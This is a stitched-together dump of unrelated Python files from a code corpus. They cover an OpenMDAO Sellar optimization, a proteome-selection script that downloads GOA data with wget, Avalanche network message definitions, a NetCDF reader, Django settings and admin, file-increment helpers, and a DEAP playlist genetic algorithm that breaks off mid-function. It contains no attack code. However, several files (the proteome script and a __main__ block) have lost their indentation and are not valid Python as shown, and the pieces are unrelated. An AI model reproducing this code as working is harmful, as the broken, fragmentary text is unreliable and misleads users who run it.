from openmdao.lib.datatypes.api import Float, Array
from openmdao.lib.differentiators.finite_difference import FiniteDifference
from openmdao.lib.drivers.api import CONMINdriver, BroydenSolver, \
SensitivityDriver, FixedPointIterator
from openmdao.lib.optproblems import sellar
class SellarBLISS(Assembly):
    """ Optimization of the Sellar problem using the BLISS algorithm
    Disciplines coupled with FixedPointIterator.
    """

    # targets used by the fixed-point iteration to carry the design
    # variables between the subproblem optimizations
    z_store = Array([0,0],dtype=Float)
    x1_store = Float(0.0)

    def configure(self):
        """ Creates a new Assembly with this problem

        Optimal Design at (1.9776, 0, 0)

        Optimal Objective = 3.18339"""

        # Disciplines
        self.add('dis1', sellar.Discipline1())
        self.add('dis2', sellar.Discipline2())

        objective = '(dis1.x1)**2 + dis1.z2 + dis1.y1 + exp(-dis2.y2)'
        constraint1 = 'dis1.y1 > 3.16'
        constraint2 = 'dis2.y2 < 24.0'

        # Top level is Fixed-Point Iteration: converges the stored design
        # variables against the subproblem results
        self.add('driver', FixedPointIterator())
        self.driver.add_parameter('dis1.x1', low= 0.0, high=10.0, start=1.0)
        self.driver.add_parameter(['dis1.z1','dis2.z1'], low=-10.0, high=10.0, start=5.0)
        self.driver.add_parameter(['dis1.z2','dis2.z2'], low= 0.0, high=10.0,start=2.0)
        self.driver.add_constraint('x1_store = dis1.x1')
        self.driver.add_constraint('z_store[0] = dis1.z1')
        self.driver.add_constraint('z_store[1] = dis1.z2')
        self.driver.max_iteration = 50
        self.driver.tolerance = .001

        # Multidisciplinary Analysis: converges the y1/y2 coupling
        self.add('mda', BroydenSolver())
        self.mda.add_parameter('dis1.y2', low=-9.e99, high=9.e99,start=0.0)
        self.mda.add_constraint('dis2.y2 = dis1.y2')
        self.mda.add_parameter('dis2.y1', low=-9.e99, high=9.e99,start=3.16)
        self.mda.add_constraint('dis2.y1 = dis1.y1')

        # Discipline 1 Sensitivity Analysis (local derivatives wrt x1)
        self.add('sa_dis1', SensitivityDriver())
        self.sa_dis1.workflow.add(['dis1'])
        self.sa_dis1.add_parameter('dis1.x1', low= 0.0, high=10.0, fd_step=.001)
        self.sa_dis1.add_constraint(constraint1)
        self.sa_dis1.add_constraint(constraint2)
        self.sa_dis1.add_objective(objective, name='obj')
        self.sa_dis1.differentiator = FiniteDifference()
        self.sa_dis1.default_stepsize = 1.0e-6

        # Discipline 2 Sensitivity Analysis
        # dis2 has no local parameter, so there is no need to treat it as
        # a subsystem.

        # System Level Sensitivity Analysis
        # Note, we cheat here and run an MDA instead of solving the
        # GSE equations. Have to put this on the TODO list.
        self.add('ssa', SensitivityDriver())
        self.ssa.workflow.add(['mda'])
        self.ssa.add_parameter(['dis1.z1','dis2.z1'], low=-10.0, high=10.0)
        self.ssa.add_parameter(['dis1.z2','dis2.z2'], low= 0.0, high=10.0)
        self.ssa.add_constraint(constraint1)
        self.ssa.add_constraint(constraint2)
        self.ssa.add_objective(objective, name='obj')
        self.ssa.differentiator = FiniteDifference()
        self.ssa.default_stepsize = 1.0e-6

        # Discipline Optimization: linearized subproblem in x1
        # (Only discipline1 has an optimization input)
        self.add('bbopt1', CONMINdriver())
        self.bbopt1.add_parameter('x1_store', low=0.0, high=10.0, start=1.0)
        self.bbopt1.add_objective('sa_dis1.F[0] + sa_dis1.dF[0][0]*(x1_store-dis1.x1)')
        self.bbopt1.add_constraint('sa_dis1.G[0] + sa_dis1.dG[0][0]*(x1_store-dis1.x1) < 0')
        #this one is technically unncessary
        self.bbopt1.add_constraint('sa_dis1.G[1] + sa_dis1.dG[1][0]*(x1_store-dis1.x1) < 0')
        # trust-region style move limits on the linearization
        self.bbopt1.add_constraint('(x1_store-dis1.x1)<.5')
        self.bbopt1.add_constraint('(x1_store-dis1.x1)>-.5')
        self.bbopt1.iprint = 0
        self.bbopt1.linobj = True

        # Global Optimization: linearized system-level subproblem in z
        self.add('sysopt', CONMINdriver())
        self.sysopt.add_parameter('z_store[0]', low=-10.0, high=10.0, start=5.0)
        self.sysopt.add_parameter('z_store[1]', low=0.0, high=10.0, start=2.0)
        self.sysopt.add_objective('ssa.F[0]+ ssa.dF[0][0]*(z_store[0]-dis1.z1) + ssa.dF[0][1]*(z_store[1]-dis1.z2)')
        self.sysopt.add_constraint('ssa.G[0] + ssa.dG[0][0]*(z_store[0]-dis1.z1) + ssa.dG[0][1]*(z_store[1]-dis1.z2) < 0')
        self.sysopt.add_constraint('ssa.G[1] + ssa.dG[1][0]*(z_store[0]-dis1.z1) + ssa.dG[1][1]*(z_store[1]-dis1.z2) < 0')
        # trust-region style move limits on the linearization
        self.sysopt.add_constraint('z_store[0]-dis1.z1<.5')
        self.sysopt.add_constraint('z_store[0]-dis1.z1>-.5')
        self.sysopt.add_constraint('z_store[1]-dis1.z2<.5')
        self.sysopt.add_constraint('z_store[1]-dis1.z2>-.5')
        self.sysopt.iprint = 0
        self.sysopt.linobj = True

        self.driver.workflow = SequentialWorkflow()
        self.driver.workflow.add(['ssa', 'sa_dis1', 'bbopt1', 'sysopt'])
if __name__ == "__main__": # pragma: no cover
import time
import math
prob = SellarBLISS()
prob.name = "top"
tt = time.time()
prob.run()
print "\n"
print "Minimum found at (%f, %f, %f)" % (prob.dis1.z1, \
prob.dis1.z2, \
prob.dis1.x1)
print "Couping vars: %f, %f" % (prob.dis1.y1, prob.dis2.y2)
print "Minimum objective: ", (prob.dis1.x1)**2 + prob.dis1.z2 + prob.dis1.y1 + math.exp(-prob.dis2.y2)
print "Elapsed time: ", time.time()-tt, "seconds" | StarcoderdataPython |
1676302 | <filename>bacteria_selection.py
# coding: utf-8
import pandas as pd
import os
import requests
from GOTool.GeneOntology import GeneOntology
import pickle
DATA_DIRECTORY = '../../../data/bacteria_selection/'
GOA_DIRECTORY = DATA_DIRECTORY + 'selection_goa/'
if os.path.exists(DATA_DIRECTORY+'proteomes_df.pkl'):
proteomes_df = pd.read_pickle(DATA_DIRECTORY+'proteomes_df.pkl')
else:
url = 'https://www.ebi.ac.uk/GOA/proteomes'
url = 'https://www.ebi.ac.uk/inc/drupal/goa/proteomes_release.html'
proteomes_df = pd.read_html(url)[0]
#proteomes_df.columns = proteomes_df.iloc[0]
proteomes_df = proteomes_df.reindex(proteomes_df.index.drop(0),)
proteomes_df['Tax ID'] = proteomes_df['Tax ID'].astype('str')
proteomes_df.to_pickle(DATA_DIRECTORY+'proteomes_df.pkl')
if os.path.exists(DATA_DIRECTORY+'taxonomy_df.pkl'):
taxonomy_df = pd.read_pickle(DATA_DIRECTORY+'taxonomy_df.pkl')
else:
taxonomy_df = pd.read_csv(DATA_DIRECTORY+'proteomes-all.tab', sep='\t') # this is a tab separated file that has to be downloaded from http://www.uniprot.org/proteomes/
taxonomy_df.drop(columns=['Proteome ID', 'Organism'], inplace=True)
taxonomy_df.drop_duplicates(inplace=True)
taxonomy_df['Organism ID'] = taxonomy_df['Organism ID'].astype('str')
taxonomy_df.to_pickle(DATA_DIRECTORY+'taxonomy_df.pkl')
found_taxons=taxonomy_df[taxonomy_df['Organism ID'].isin(proteomes_df['Tax ID'].astype('str'))]
proteomes_df = proteomes_df.merge(found_taxons, left_on='Tax ID', right_on='Organism ID')
proteomes_df = proteomes_df[proteomes_df['Total entries'] == proteomes_df['Protein count']]
proteomes_df['Superkingdom'] = proteomes_df['Taxonomic lineage'].str.partition(',')[0]
bacteria_df = proteomes_df[proteomes_df['Superkingdom'] == 'Bacteria']
print(f'Downloading {bacteria_df.shape[0]} files...')
# ## Download GOAS
# create the selection_goa directory if it doesn't exist
if not os.path.exists(GOA_DIRECTORY):
os.makedirs(GOA_DIRECTORY)
found = 0
not_found = []
for f in proteomes_df[proteomes_df['Superkingdom'] == 'Bacteria']['File']:
if not os.path.isfile(GOA_DIRECTORY+f):
url = 'ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/{file}'.format(file=f)
command = 'wget -P '+GOA_DIRECTORY+' "'+ url + '"'
not_found.append(command)
else:
found += 1
print(found, 'proteomes found')
print(len(not_found), 'proteomes not found')
# try to download all not found, but probably by hand is better
for command in not_found:
os.system(command)
# ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/4116045.A_yellow_vein_Taiwan_virus-[Taiwan].goa
for f in proteomes_df[(proteomes_df['File'].isin([a.split('/')[-1] for a in not_found])) & (proteomes_df['Superkingdom']=='Bacteria')]['File']:
print('wget "ftp://ftp.ebi.ac.uk/pub/databases/GO/goa/proteomes/'+ f + '"')
bacteria_df.head()
if os.path.exists(DATA_DIRECTORY+'selection_count_df.pkl'):
selection_count_df = pd.read_pickle(DATA_DIRECTORY+'selection_count_df.pkl')
else:
go = GeneOntology(DATA_DIRECTORY + 'go.obo')
go.build_structure()
data = []
counter = 0
for i, organism in bacteria_df.iterrows():
d = {}
go.load_annotation_file(GOA_DIRECTORY+organism['File'], organism['Organism'], GeneOntology.ALL_EVIDENCE_CODES)
go.load_annotation_file(GOA_DIRECTORY+organism['File'], organism['Organism'] + ' exp', GeneOntology.EXPERIMENTAL_EVIDENCE_CODES)
go.up_propagate_annotations(organism['Organism'] + ' exp')
# any evidence code
annotated_terms = [t for t in go.terms.values() if organism['Organism'] in t.annotations]
annotated_genes = set()
for t in annotated_terms:
annotated_genes |= set(t.annotations[organism['Organism']].keys())
d['Tax ID'] = organism['Tax ID']
d['all genes'] = len(annotated_genes)
# experimental annotations
org = organism['Organism'] + ' exp'
annotated_terms = [t for t in go.terms.values() if org in t.annotations]
annotated_genes = set()
annotations_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
terms_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
for t in annotated_terms:
annotated_genes |= set(t.annotations[org].keys())
annotations_by_domain[t.domain] |= set(t.annotations[org].keys())
terms_by_domain[t.domain].add(t)
# terms annotated with 3 genes or more
popular_terms = [t for t in annotated_terms if len(t.annotations[org]) >= 3]
# genes annotated to those terms
popular_genes = set()
popular_by_domain = {'biological_process': set(), 'cellular_component': set(), 'molecular_function': set()}
popular_terms_by_domain = {'biological_process': set(), 'cellular_component': set(),
'molecular_function': set()}
for t in popular_terms:
popular_genes |= set(t.annotations[org].keys())
popular_by_domain[t.domain] |= set(t.annotations[org].keys())
popular_terms_by_domain[t.domain].add(t)
d['exp annotations'] = len(annotated_genes)
d['popular genes'] = len(popular_genes)
d['annotated terms'] = len(annotated_terms)
d['popular terms'] = len(popular_terms)
d['terms bp'] = len(terms_by_domain['biological_process'])
d['terms mf'] = len(terms_by_domain['molecular_function'])
d['terms cc'] = len(terms_by_domain['cellular_component'])
d['pop bp'] = len(popular_terms_by_domain['biological_process'])
d['pop mf'] = len(popular_terms_by_domain['molecular_function'])
d['pop cc'] = len(popular_terms_by_domain['cellular_component'])
data.append(d)
counter += 1
if counter % 1000 == 0:
print((float(counter)/len(bacteria_df['Tax ID'])) * 100.0, '%')
selection_count_df = pd.DataFrame(data)
selection_count_df.to_pickle(DATA_DIRECTORY+'selection_count_df.pkl')
pickle.dump(data, open(os.path.join(DATA_DIRECTORY,'data.pkl'), 'wb'))
selection_df = bacteria_df.merge(selection_count_df, left_on='Tax ID', right_on='Tax ID')
selection_df.to_pickle(DATA_DIRECTORY+'selection_df.pkl')
ontology_tau = 8
annotations_tau = 10
res = selection_df[
(selection_df['exp annotations'] >= annotations_tau) &
(selection_df['pop bp'] >= ontology_tau) &
(selection_df['pop mf'] >= ontology_tau) &
(selection_df['pop cc'] >= ontology_tau)
# (results_is_a_part_of['popular genes'] > 50) &
# (results_is_a_part_of['popular terms'] > 50)
][['Tax ID', 'Organism', 'File','all genes', 'annotated terms',
'exp annotations', 'pop bp', 'pop cc', 'pop mf', 'popular genes',
'popular terms', 'terms bp', 'terms cc', 'terms mf']]
res_untrimmed = selection_df[
(selection_df['exp annotations'] >= annotations_tau) &
(selection_df['pop bp'] >= ontology_tau) &
(selection_df['pop mf'] >= ontology_tau) &
(selection_df['pop cc'] >= ontology_tau)
# (results_is_a_part_of['popular genes'] > 50) &
# (results_is_a_part_of['popular terms'] > 50)
]
res.to_pickle(os.path.join(DATA_DIRECTORY, 'selected_bacteria_df.pkl')) | StarcoderdataPython |
3247894 | # avax-python : Python tools for the exploration of the Avalanche AVAX network.
#
# Find tutorials and use cases at https://crypto.bi
"""
Copyright (C) 2021 - crypto.bi
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---
Help support this Open Source project!
Donations address: X-avax1qr6yzjykcjmeflztsgv6y88dl0xnlel3chs3r4
Thank you!
"""
# --#--#--
from .Op import Op
from .Field import Field
class Messages:
    """
    Network message structures.

    Maps each network operation (Op) to the ordered list of Fields that make
    up its payload, mirroring the canonical Go definition.

    Canonical version: avalanchego/network/commands.go
    """
    __msg_structure = {
        # Handshake:
        Op.GetVersion: [],
        Op.Version: [Field.NetworkID, Field.NodeID, Field.MyTime, Field.IP, Field.VersionStr],
        Op.GetPeerList: [],
        Op.PeerList: [Field.Peers],
        Op.Ping: [],
        Op.Pong: [],
        # Bootstrapping:
        Op.GetAcceptedFrontier: [Field.ChainID, Field.RequestID, Field.Deadline],
        Op.AcceptedFrontier: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
        Op.GetAccepted: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerIDs],
        Op.Accepted: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
        Op.GetAncestors: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
        Op.MultiPut: [Field.ChainID, Field.RequestID, Field.MultiContainerBytes],
        # Consensus:
        Op.Get: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
        Op.Put: [Field.ChainID, Field.RequestID, Field.ContainerID, Field.ContainerBytes],
        Op.PushQuery: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID, Field.ContainerBytes],
        Op.PullQuery: [Field.ChainID, Field.RequestID, Field.Deadline, Field.ContainerID],
        Op.Chits: [Field.ChainID, Field.RequestID, Field.ContainerIDs],
        # Signature
        Op.SignedVersion: [Field.NetworkID, Field.NodeID, Field.MyTime, Field.IP, Field.VersionStr, Field.VersionTime, Field.SigBytes],
        Op.SignedPeerList: [Field.SignedPeers],
    }

    @classmethod
    def get(cls, op):
        """Return the field list for *op*; raise LookupError for unknown ops.

        Single dict lookup (EAFP) instead of the original membership test
        followed by a second ``.get`` lookup.
        """
        try:
            return cls.__msg_structure[op]
        except KeyError:
            raise LookupError(f"Message structure not found for Op {op}") from None
| StarcoderdataPython |
75631 | <reponame>Kieran-Bacon/Expert-Opinions-Vegetation-Change<gh_stars>0
"""
Implements the ModelFile class for use with NetCDF files.
"""
import warnings
import numpy as np
from netCDF4 import Dataset
from ExpertRep.abstract.ClimateEvalAPI import ModelFile
from ExpertRep.tools.geojson_gen import dict_to_geojson
class NetCDFFile(ModelFile):
    """A ModelFile backed by a NetCDF dataset.

    Reads the 'frac' variable plus its latitude/longitude axes and exposes
    dense (numpy) and sparse (geojson) views of the per-layer data.
    """

    def __init__(self, netcdf_file: str, initialise: bool = True):
        """Open *netcdf_file* and cache its arrays.

        With ``initialise=False`` an empty shell is created; ``load()`` uses
        this to restore a previously saved instance.
        """
        super(NetCDFFile, self).__init__(netcdf_file=netcdf_file)
        if initialise:
            dataset = Dataset(netcdf_file, "r", format="NETCDF4")
            self.numpy_arrays = np.array(dataset.variables['frac'])
            self.lat = np.array(dataset.variables['latitude'])
            self.lon = np.array(dataset.variables["longitude"])
            dataset.close()
        else:
            self.numpy_arrays = None
            self.lat = None
            self.lon = None
        # Per-layer sparse dicts {(lat, lon): value}; built lazily by get_geojson.
        self.sparse = None

    def get_numpy_arrays(self, layer: int = -1, resize_to: tuple = None, remove_nan: bool = True) -> np.array:
        """Return the dense data, optionally a single layer and/or NaN-free.

        ``layer == -1`` returns all layers. With ``remove_nan`` a copy is
        returned with NaNs replaced by 0 (the cached arrays stay untouched).
        """
        if resize_to is not None:
            raise NotImplementedError("Not yet implemented")
        if layer == -1:
            arrays = self.numpy_arrays
        else:
            arrays = self.numpy_arrays[layer]
        if remove_nan:
            nan_mask = np.isnan(arrays)
            arrays = np.array(arrays, copy=True)
            arrays[nan_mask] = 0
        return arrays

    def get_info(self) -> dict:
        raise NotImplementedError("Not yet implemented")

    def get_geojson(self, layer_id: int) -> str:
        """Return the GeoJSON for one layer, rebuilding the sparse cache.

        The full ``self.sparse`` list is still populated (``save()`` persists
        it), but only the requested layer is converted to GeoJSON — the
        original converted every layer and then indexed a single one.
        """
        self.sparse = [dict() for _ in range(self.numpy_arrays.shape[0])]
        with warnings.catch_warnings():
            # The warning produced by undefined behaviour on self.numpy_arrays > 1e-5
            # for NAN values is dealt with by the previous clause.
            warnings.filterwarnings("ignore", category=RuntimeWarning)
            vals = np.where(np.logical_and(np.logical_not(np.isnan(self.numpy_arrays)), self.numpy_arrays > 1e-5))
        for layer, i, j in zip(*vals):
            self.sparse[layer][(self.lat[i], self.lon[j])] = self.numpy_arrays[layer, i, j]
        return dict_to_geojson(self.sparse[layer_id])

    def save(self, file_path: str) -> None:
        """Serialise the instance as a sequence of ``np.save`` records."""
        with open(file_path, "wb") as file_obj:
            np.save(file_obj, np.array([self.netcdf_file_path]))
            np.save(file_obj, self.sparse)
            np.save(file_obj, self.numpy_arrays)
            np.save(file_obj, self.lat)
            np.save(file_obj, self.lon)

    def __hash__(self):
        # Hash the raw bytes of the cached arrays; matches __eq__'s fields.
        return hash((self.numpy_arrays.data.tobytes(), self.lat.tobytes(), self.lon.tobytes()))

    def __eq__(self, other):
        return (np.allclose(self.get_numpy_arrays(), other.get_numpy_arrays(), equal_nan=True) and
                np.allclose(self.lat, other.lat, equal_nan=True) and
                np.allclose(self.lon, other.lon, equal_nan=True))

    @classmethod
    def load(cls, file_path: str) -> "ModelFile":
        """Restore an instance previously written by ``save()``.

        ``sparse`` is an object array (list of dicts), so it must be read with
        ``allow_pickle=True`` — NumPy >= 1.16.2 defaults to False and the
        original call raised ValueError there.
        """
        with open(file_path, "rb") as file_obj:
            str_array = np.load(file_obj)
            instance = cls(str(str_array[0]), initialise=False)
            instance.sparse = np.load(file_obj, allow_pickle=True)
            numpy_arrays = np.load(file_obj)
            instance.numpy_arrays = numpy_arrays
            instance.lat = np.load(file_obj)
            instance.lon = np.load(file_obj)
        return instance
| StarcoderdataPython |
1660872 | from .settings import *
# Apps developed as part of this project.
PROJECT_APPS = [
    'users.apps.UsersConfig',
]

# INSTALLED_APPS comes from the base settings (star import above); the
# original appended "[] + PROJECT_APPS" — the empty list was redundant.
INSTALLED_APPS += PROJECT_APPS

# Use the project's custom user model instead of django.contrib.auth.User.
AUTH_USER_MODEL = 'users.User'
| StarcoderdataPython |
3288343 | import errno, os, inspect
def mkdir_p(path):
    """Create *path* (including parents) like ``mkdir -p`` and return it.

    An already-existing directory is not an error; any other OSError
    propagates.
    """
    try:
        os.makedirs(path)
    except OSError as exc:
        # Tolerate only the "already exists as a directory" case.
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
    return path
def touch(file_path):
    """Create *file_path* if missing; existing content is left intact (append mode)."""
    with open(file_path, 'a'):
        pass
def to_unix_path(path):
    """Return *path* with every backslash normalised to a forward slash."""
    return '/'.join(path.split('\\'))
def create_increment_folder( folder_prefix, parent_folder ):
    """Create ``<parent_folder>/<folder_prefix><n>`` and return ``(path, n)``.

    *n* is one past the highest numeric suffix among existing subfolders whose
    name contains *folder_prefix*. Folders whose remainder is not an integer
    are counted as suffix 0 — the original crashed with ValueError on them,
    while the sibling create_increment_file already tolerated that case.
    """
    parent_folder = to_unix_path(parent_folder)
    folders = [name for name in os.listdir(parent_folder) if os.path.isdir(os.path.join(parent_folder, name))]
    matching_folders_numbers = []
    for folder_name in folders:
        if folder_prefix in folder_name:
            try:
                suffix = int(folder_name.replace(folder_prefix, ''))
            except ValueError:
                # Non-numeric remainder (e.g. "run_final"): treat as 0,
                # consistent with create_increment_file.
                suffix = 0
            matching_folders_numbers.append(suffix)
    if matching_folders_numbers:
        highest_folder = max(matching_folders_numbers)
    else:
        highest_folder = 0
    new_folder_idx = highest_folder + 1
    new_folder_path = os.path.join(parent_folder, folder_prefix + str(new_folder_idx))
    mkdir_p(new_folder_path)
    return (new_folder_path, new_folder_idx)
def create_increment_file( file_prefix, parent_folder,ext='',dont_touch=True):
    """Build the next ``<file_prefix><n>.<ext>`` path and return ``(path, n)``.

    *n* is one past the highest numeric suffix among existing files whose stem
    contains *file_prefix*. When *ext* is empty it is inherited from the first
    matching file. With ``dont_touch=False`` the file is also created.

    Fixes over the original: no IndexError when ext=='' and nothing matches,
    and the inherited extension no longer keeps splitext's leading dot (which
    produced names like "run2..txt").
    """
    mkdir_p(parent_folder)
    parent_folder = to_unix_path(parent_folder)
    files = [name for name in os.listdir(parent_folder) if os.path.isfile(os.path.join(parent_folder, name))]
    matching_files_numbers = []
    matching_files = []
    for filename in files:
        filestem = os.path.splitext(filename)[0]
        if file_prefix in filestem:
            try:
                split_result = int(filestem.replace(file_prefix, ''))
            except Exception:
                # Non-numeric remainder: count it as suffix 0.
                split_result = 0
            matching_files_numbers.append(split_result)
            matching_files.append(filename)
    if ext == '' and matching_files:
        # Inherit the extension of an existing match; splitext keeps the dot,
        # so strip it before re-joining with '.' below.
        ext = os.path.splitext(matching_files[0])[-1].lstrip('.')
    if matching_files_numbers:
        highest_file = max(matching_files_numbers)
    else:
        highest_file = 0
    new_file_idx = highest_file + 1
    new_file_path = os.path.join(parent_folder, file_prefix + str(new_file_idx) + '.' + ext)
    if not dont_touch:
        touch(new_file_path)
    return (new_file_path, new_file_idx)
def get_python_func_tempdir():
    """Create ``/tmp/python_<caller>`` plus a dated increment subfolder.

    Returns ``(base_dir, (subfolder_path, subfolder_idx))``.
    """
    # Name of the function that called us, via the interpreter frame stack.
    mycaller = inspect.getouterframes(inspect.currentframe(), 2)[1][3]
    out = os.path.join('/tmp', 'python_' + mycaller)
    mkdir_p(out)
    # The original called get_simple_date(), which is not defined anywhere in
    # this module (NameError at runtime). A plain ISO date prefix is assumed
    # to be the intent — TODO confirm against the missing helper.
    import time
    date_prefix = time.strftime('%Y-%m-%d')
    tmpdir = create_increment_folder(date_prefix, out)
    return (out, tmpdir)
| StarcoderdataPython |
3247083 | from django.contrib import admin
# Model managed through the Django admin site.
from .models import DeferredAction

# Register with an inline changelist configuration; no ModelAdmin subclass is
# needed for a simple column layout.
admin.site.register(DeferredAction,
                    list_display=('token', 'valid_until', 'confirmed', 'is_expired'))
| StarcoderdataPython |
class Student:
    """Toy example that prints the numbers 0..count-1.

    NOTE(review): the original class header was fused with dataset-dump
    residue ("3207601 | class Student:") making it a syntax error; fixed.
    """

    def __init__(self, std):
        # Number of values go() will print.
        self.count = std

    def go(self):
        """Print 0 through count-1, one value per line."""
        for i in range(self.count):
            print(i)
# Demo entry point: print 0..4 when run as a script.
if __name__ == '__main__':
    Student(5).go()
| StarcoderdataPython |
1697793 | <gh_stars>10-100
# Load prepared track metadata and features
# Optionally restrict the playlist to a single genre (None = no restriction).
REQUIRED_GENRE = None #'Electronic'
import pickle
# Pre-extracted track metadata and audio features, keyed by track identifier.
with open('tracks_metadata.pkl', 'rb') as f:
    tracks_metadata = pickle.load(f)
with open('track_features.pkl', 'rb') as f:
    track_features = pickle.load(f)
# Working list of every known track key.
all_tracks = list(tracks_metadata.keys())
def computeTrackDuration(track):
    """Return the duration of *track* in minutes (float).

    The metadata stores durations as "SS", "MM:SS" or "HH:MM:SS".
    """
    duration = tracks_metadata[track]['track_duration']
    parts = duration.split(':')
    if len(parts) == 2:
        hours = 0
        mins, secs = parts
    elif len(parts) == 3:
        hours, mins, secs = parts
    else:
        hours, mins, secs = 0, 0, duration
    return float(hours) * 60.0 + float(mins) + float(secs) / 60.0
# remove tracks that have missing keys
# NOTE(review): 'genres' is tested twice in the condition below (harmless
# duplication), and missing_required_genre is set but never read.
removed_tracks = []
for track in all_tracks:
    # Drop tracks lacking any of the features the fitness function needs.
    if 'genres' not in track_features[track] or 'bpm' not in track_features[track] or 'beats_loudness' not in track_features[track] or 'loudness' not in track_features[track] or 'dissonance' not in track_features[track] or 'genres' not in track_features[track] or 'tonal_key' not in track_features[track] or 'interest' not in track_features[track] or 'listens' not in track_features[track] or 'favorites' not in track_features[track]:
        del tracks_metadata[track]
        del track_features[track]
        removed_tracks.append(track)
        continue
    # Keep only tracks between 3 and 10 minutes long.
    duration = computeTrackDuration(track)
    if duration < 3 or duration > 10:
        del tracks_metadata[track]
        del track_features[track]
        removed_tracks.append(track)
        continue
    # Optional genre restriction (see REQUIRED_GENRE above).
    if REQUIRED_GENRE is not None:
        if REQUIRED_GENRE not in track_features[track]['genres']:
            missing_required_genre = True
            del tracks_metadata[track]
            del track_features[track]
            removed_tracks.append(track)
all_tracks = list(set(all_tracks)-set(removed_tracks))
import numpy
import random
import sys
from deap import algorithms
from deap import base
from deap import creator
from deap import tools
# To evaluate an individual (a playlist), we'll compute a variety of scores:
#
# - Total playlist time - desired playlist time (e.g., 1hr), absolute value difference
# - Minimize
# - Entropy of genres: sum across every possible genre g: - percent-of-songs-with-genre * log(percent-of-songs-with-genre)
# - Minimize, i.e., have a playlist with mostly the same genre
# - Entropy of tonal keys
# - Minimize
# - Difference in beats-per-minute in successive songs (absolute sum)
# - Minimize
# - Absolute difference of largest beats loudness - smallest beats loudness
# - Minimize
# - Absolute difference of largest loudness - smallest loudness
# - Minimize
# - Absolute difference of largest dissonance - smallest dissonance
# - Minimize
# - Average interest
# - Maximize
# - Average listens
# - Maximize
# - Average favorites
# - Maximize
import math
from collections import Counter
def calcEntropy(individual, field, multivalue):
    """Shannon entropy of *field* across the playlist's tracks.

    For multivalue fields (e.g. genres) every value of every track is counted;
    otherwise each track contributes one value. p is normalised by playlist
    length, matching the original.
    """
    valcounts = Counter()
    for track in individual:
        if multivalue:
            valcounts.update(track_features[track][field])
        else:
            valcounts.update([track_features[track][field]])
    entropy = 0.0
    # Iterate the distinct counts, not Counter.elements(): elements() yields
    # each value `count` times, so the original summed every -p*log(p) term
    # `count` times and overstated the entropy (the header comment documents
    # a plain sum over each possible value).
    for count in valcounts.values():
        p = float(count) / float(len(individual))
        if p > 0:
            entropy -= p * math.log(p)
    return entropy
def evalPlaylist(individual, desired_play_time):
    """Score a playlist on ten objectives (paired with FitnessMulti weights).

    Returns (diff_play_time, genre_entropy, tonal_keys_entropy, sum_diff_bpm,
    diff_beats_loudness, diff_loudness, diff_dissonance, avg_interest,
    avg_listens, avg_favorites). The first seven are minimised, the last
    three maximised.
    """
    # |actual - desired| total play time, in minutes.
    play_time = sum(computeTrackDuration(track) for track in individual)
    diff_play_time = abs(play_time - desired_play_time)

    # Prefer homogeneous playlists: low entropy of genres and tonal keys.
    genre_entropy = calcEntropy(individual, 'genres', True)
    tonal_keys_entropy = calcEntropy(individual, 'tonal_key', False)

    # Total BPM jump between consecutive tracks (smooth transitions).
    sum_diff_bpm = sum(
        abs(track_features[individual[i - 1]]['bpm'] -
            track_features[individual[i]]['bpm'])
        for i in range(1, len(individual)))

    def _spread(feature):
        # max - min over the playlist. The original initialised its running
        # max to 0.0, which corrupts the spread whenever every value is
        # negative (e.g. loudness expressed in dB).
        values = [track_features[track][feature] for track in individual]
        return max(values) - min(values)

    diff_beats_loudness = _spread('beats_loudness')
    diff_loudness = _spread('loudness')
    diff_dissonance = _spread('dissonance')

    # Popularity averages (to be maximised).
    n = float(len(individual))
    avg_interest = sum(track_features[t]['interest'] for t in individual) / n
    avg_listens = sum(track_features[t]['listens'] for t in individual) / n
    avg_favorites = sum(track_features[t]['favorites'] for t in individual) / n

    return (diff_play_time, genre_entropy, tonal_keys_entropy,
            sum_diff_bpm, diff_beats_loudness, diff_loudness, diff_dissonance,
            avg_interest, avg_listens, avg_favorites)
# A playlist is invalid when it has fewer than 3 songs or repeats a song.
def validPlaylist(individual):
    """Return True for playlists with >= 3 tracks and no duplicates."""
    has_enough = len(individual) >= 3
    all_unique = len(set(individual)) == len(individual)
    return has_enough and all_unique
# Fitness weights: the first seven objectives are minimised (-1.0), the last
# three (interest / listens / favorites) are maximised (+1.0); order matches
# the tuple returned by evalPlaylist.
creator.create("FitnessMulti", base.Fitness,
               weights=(-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, 1.0, 1.0, 1.0))
# An individual is a plain list of track keys carrying the fitness above.
creator.create("Individual", list, fitness=creator.FitnessMulti)
# Mutation operator: with equal probability either insert a random track at a
# random position (if not already present) or, when the playlist is long
# enough, delete a random track. Returns a 1-tuple as DEAP expects.
def mutatePlaylist(individual):
    coin = random.random()
    if coin > 0.5:
        # Insertion: pick a candidate track and splice it in at a random slot.
        candidate = random.choice(all_tracks)
        if candidate not in individual:
            slot = random.choice(range(0, len(individual)))
            individual = individual[:slot] + [candidate] + individual[slot:]
    elif len(individual) > 5:
